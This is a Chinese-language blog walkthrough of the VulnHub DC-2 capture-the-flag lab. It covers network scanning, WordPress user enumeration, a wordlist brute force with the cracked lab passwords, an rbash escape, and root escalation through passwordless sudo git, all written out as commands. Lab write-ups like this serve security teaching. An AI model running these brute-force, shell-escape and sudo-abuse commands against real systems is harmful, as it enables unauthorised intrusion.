VnlnHub DC-2

最新推荐文章于 2023-09-10 17:14:43 发布
最新推荐文章于 2023-09-10 17:14:43 发布
阅读量237 收藏 1
点赞数 2
文章标签: 安全 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45682839/article/details/124183694
版权

靶场搭建

靶场下载地址:DC: 2 ~ VulnHub

下载镜像(Mirror版本)

下载下来的文件为 .OVA压缩文件,直接导入vmvare指定解压位置即可

网卡设置和攻击机KALI保持一致即可,这里我选择NAT模式

开机,靶场搭建完毕

渗透测试

首先明确目标,和之前的DC-1靶机一样,目标为5个flags

由于不知道靶机IP地址,所以使用nmap扫描整个网段

nmap -sP -T4 192.168.48.0/24

发现136和137两台主机(1,2,254是网关和广播地址)

136是KALI攻击机,所以靶机地址为192.168.48.137

对靶机进行扫描

nmap -sS -sV -Pn 192.168.48.137

只开启了80端口,存在web

访问web

访问失败

查看F12为301永久重定向

需要在kali中编辑hosts文件

vi /etc/hosts

再次访问网站

获得flag1

flag1提示我们,需要密码字典,但是普通的密码字典肯没用,需要使用cewl,越多密码越好,登录获得下一个flag,如果你找不到,登录下一个

在网站主页没有发现可以登录的地方,我们搜索一下敏感目录

扫描敏感目录发现wordpress后台

使用kali自带的工具wpscan进行爆破

        wpscan常用参数

                --update 更新病毒数据库

                -h 帮助信息

                --url 指定url

                --enumerate/-e vp/vt/t/u/p

                vp为扫描插件中漏洞,vt为扫描主题中的漏洞,t为扫描主题,u为爆破用户名,p为扫描安装的插件

扫描列举用户名

wpscan --url http://dc-2/ -e u

列举出admin、jerry、tom三个用户

将三个用户名编辑为一个用户字典文件dc2user.txt

vi dc2user.txt

根据flag1提示,使用cewl爬取网站关键词来生成密码字典

cewl http://dc-2/ -w dc2pass.txt

-w 指定输出文件

查看一下文件,看是否生成成功

cat dc2pass.txt

利用wpscan进行爆破

wpscan --url http://dc-2/ -U dc2user.txt -P dc2pass.txt

爆破出两个用户的密码

jerry / adipiscing

tom / parturient

先用jerry登录试试

登录成功

在page中找到flag2

flag2提示:如果你不能利用WordPress,也不能走捷径,还有另外的方式,祝愿你能找到。

尝试用另一个账号登录试试

登录成功

但是没有找到任何线索

没有思路了,去看了别人的通关记录,发现还扫出了另一个端口开放,才知道,是因为扫描的时候没有指定全端口扫描,漏扫了端口,有端口修改,所以没有扫出来

进行全端口扫描

nmap -A -p 1-65535 192.168.48.137

-p 1-65535 或者-p- 都可以指定全端口扫描

发现存在ssh远程登录服务,刚tom账号登录后台没有找到线索,现在用tom账号登录一下ssh服务试试

ssh tom@192.168.48.137 -p 7744

登录成功

ls

发现目录存在flag3.txt文件

cat flag3.txt 发现cat命令不可用

more flag3.txt 发现more命令也不可用

查看一下哪些命令可用

echo $PATHtom@DC2:~$ echo /home/tom/usr/bin/*

发现可以用的命令:less、ls、scp、vi

用less和vi都可以查看文件,我这里用vi

vi flag3.txt

flag3提示:贫穷的老tom总是走在jerry后面,也许他应该su缓解他的压力

意思让那个我们su 切换到jerry用户

但是不能执行su命令

所以我们需要绕过rbash(受限的bash)(这个我也是第一次接触,网上找的)

执行如下命令:

BASH_CMDS[a]=/bin/sh;a         // 把/bin/bash给a变量

export PATH=$PATH:/bin/         // 将/bin 作为PATH环境变量导出

export PATH=$PATH:/usr/bin         // 将/usr/bin作为PATH环境变量导出

接下里su到jerry用户

切换到jerry的家目录

cd /home/jerry

ls

发现flag4.txt

cat flag4.txt

flag4的意思是很高兴你已经到达这,但是你还没有到家,你需要找到最后的flag,这你没有给你的提示,现在要靠你自己,继续,git离开这里,这里的git是个提示

现在我们还没有获得最高权限,所以我们只能通过提权方式获得最高权限

Linux提权

1、内核提权(脏牛肉提权)

2、suid提权

3、sudo提权

4、数据库提权

sudo -l 查看有没有特权命令

发现git特权命令,且没有密码(这就是flag4中提示的)

使用以下命令强制进入交互模式提权

        /usr/bin/sudo git -p help config

        !/bin/bash

成功提权

cd /root

ls

cat final-flag.txt

奋斗吧!小胖子
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VnlnHub admx
weixin_45682839的博客
09-02 342
VnlnHub admx靶场通关记录攻略,涉及知识包括:端口服务探测、铭感目录扫描、burp页面内容批量替换、后台密码爆破、wordpress后台getshell、nc串联,python反弹shell、升级反弹的不完整shell、linux本地提权
VnlnHub CHRONOS 1
weixin_45682839的博客
09-03 530
VnlnHub CHRONOS 1靶场通关攻略记录,涉及知识包括:端口服务探测、解编码、命令注入、nc串联、linux本地提权、框架漏洞利用
VnlnHub Hacker_Kid-v1.0.1
2301_76786857的博客
09-10 135
之后挨个查看源码,看信息,发下了一个注释:使用参数page_no,这里参数很像一个页面的页码,我们尝试在后面加上page_no这个参数,发现出现了一段提示说我们的方法是对的,我们用BP爆破出他的数值到底是多少。发现我们输入的这些信息都是通过XML数据来发送,所以我们就猜测这里可能存在XXE漏洞,进行漏洞探测。我们就使用dig命令来进行探测。这就让我们感到奇怪。我们只扫描TCP的端口,尝试扫描UDP53端口,发现确实是UDP53端口是开放的。这个权限(可以调试程序权限),而这个权限是有提权的可能的一个权限。
VnlnHub Corrosion
weixin_45682839的博客
08-17 486
VnlnHub Corrosion系列主机中的第一台靶机过关攻略记录,涉及知识包括:存活主机扫描、端口服务探测、铭感目录(文件)搜索、url参数名爆破、文件包含漏洞利用、zip压缩包密码爆破、linux提权等。...
VnlnHub-y0usef 1 靶场 打靶记录
lcc001114的博客
06-15 118
发现提权的命令都可以用!那这就简单了,直接用一个我经常用的sudo su命令进行提权。登录成功之后查看了各种可能藏flag的目录并未发现信息,查看root目录时提示说没有权限。上传php文件修改content-type为image/png(这个图没截上,用的别人的,改成下面框选的就行。尝试上传一个png文件,发现上传成功,服务器只允许上传png文件,我们看能否进行绕过。连接成功,打开蚁剑的虚拟终端,并在home目录下发现了第一个flag。那这就涉及到提权的操作了,sudo -l查看有哪些能用的提权命令。
DC-DC PCB layout 指导.docx
06-18
DC-DC PCB Layout 指导 DC-DC PCB 布局是影响 DC-DC 转换器性能的关键因素之一。与 LDO 相比,DC-DC 电路的布局要求更高,因为它具有更高的噪声和更复杂的电路结构。因此,了解 DC-DC 布局的重要性和设计原则是非常...
DC-002 DC-005 DC-012 电源接口2D3D三维视图PCB封装库AD库(8个合集).zip
05-31
DC-002 DC-005 DC-012 电源接口2D3D三维视图PCB封装库AD库(8个合集) Component Count : 8 Component Name ----------------------------------------------- DC-002 DC-003 DC-003A DC-005 DC-005P DC-012 DC-...
DC-DC变换器Simulink仿真模型
08-07
本人在Simulink平台搭建的DC-DC变换器仿真模型,可以使用构成你自己模型的一部分。
DC-DC电源设计
01-12
一、传统变压器篇  本文主要讲了一下关于DC DC电源转换电路设计需要注意的一些...不同应用领域规律不同,如PC中常用的是12V、5V、3.3V,模拟电路电源常用5V 15V,数字电路常用3.3V等,现在的FPGA、DSP还用2V以下的电
dc-sdk-examples:DC-SDK开发示例
05-11
dc-sdk-examples DC-SDK开发示例 该示例需要放到 中运行,将 public/examples 目录下的内容替换即可
VnlnHub DC-4
weixin_45682839的博客
04-16 1428
靶场搭建 靶场下载地址:DC: 4 ~ VulnHub 下载镜像(Mirror版本) 下载下来的文件为 .OVA压缩文件,直接导入vmvare指定解压位置即可 网卡设置和攻击机KALI保持一致即可,这里我选择NAT模式 开机,靶场搭建完毕 渗透测试 首先明确目标,只有一个flag,有很多种进入的方法,没有提示 由于不知道靶机IP地址,所以使用nmap扫描整个网段 nmap -sP -T4 192.168.48.0/24 发现136和140两台主机(1,2,25
VnlnHub DC-3.2
weixin_45682839的博客
04-16 890
VnlnHub DC-3.2 攻关记录攻略,得到一个flag和root权限
VnlnHub Vikings
weixin_45682839的博客
09-13 850
涉及知识包括:端口服务探测、敏感目录文件搜集、base64编码、WEB信息收集、文件还原、压缩包密码爆破、图片隐写和提取、素数、考拉兹猜想、python代码编写、rpyc服务提权
VulnHub靶场LupinOne
I夜白
02-01 4974
VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 直接解压用虚拟机打开就行,不用自己配置,没有账号密码,需要自己一步步来,对了,这是自动获取IP的,不需要自己配置. 一.信息收集 信息收集是很重要的,举个栗子来说,比如约出自己的女神出来玩,肯定向了解女神的经济情况还有喜好嘛,通过她的微信朋友圈,她身边的好友,淘宝等等,了解一个人,就要从最贴近生活的方向开始,就像"只有千日做贼,那有千日防贼",感觉有点不太贴切,意思是差不多的,用这个只是想表达信息收集的重
Ubuntu(Linux系统)安装Vulhub靶场——nginx
edsion4的博客
12-04 621
Ubuntu(Linux系统)安装Vulhub靶场——nginx
VnlnHub DC-6
weixin_45682839的博客
04-23 2920
VnlnHub DC-6通关攻略记录
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
Vulnhub靶机检测不到IP地址
asstart的博客
12-07 6398
vulnhub靶机无法获取IP地址 0x00前言 小编从vulnhub官网下载靶机,准备做学习测试时,使用kali无法检测到靶机的IP,arp-scan、nmap存活主机探测、netdiscover均未检测到靶机的IP地址,因为我们无法获取靶机的IP地址的话就没办法进行下一步。 0x01排查 确保kali与vulnhub靶机同处在一个网络环境。经过确认kali虚拟机和vulnhub靶机均同处在VM...
带妹玩转Vulnhub【一】
BadRer的博客
09-27 7436
前言 题目是不想在刷了,想学一学渗透测试的知识。 由于是开头之作,所以会写的比较的详细,尽量让大家少走弯路。 带妹是不可能带妹的,这辈子都不可能带妹的
深度学习2DC-RES
最新发布
05-09
2DC-ResNet是一种深度学习神经网络模型,用于图像识别和分类任务。它基于ResNet的思想,通过残差连接来解决深度网络的退化问题,并采用2D卷积层来提取图像特征。2DC-ResNet在各种图像识别和分类任务中都表现出了良好...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值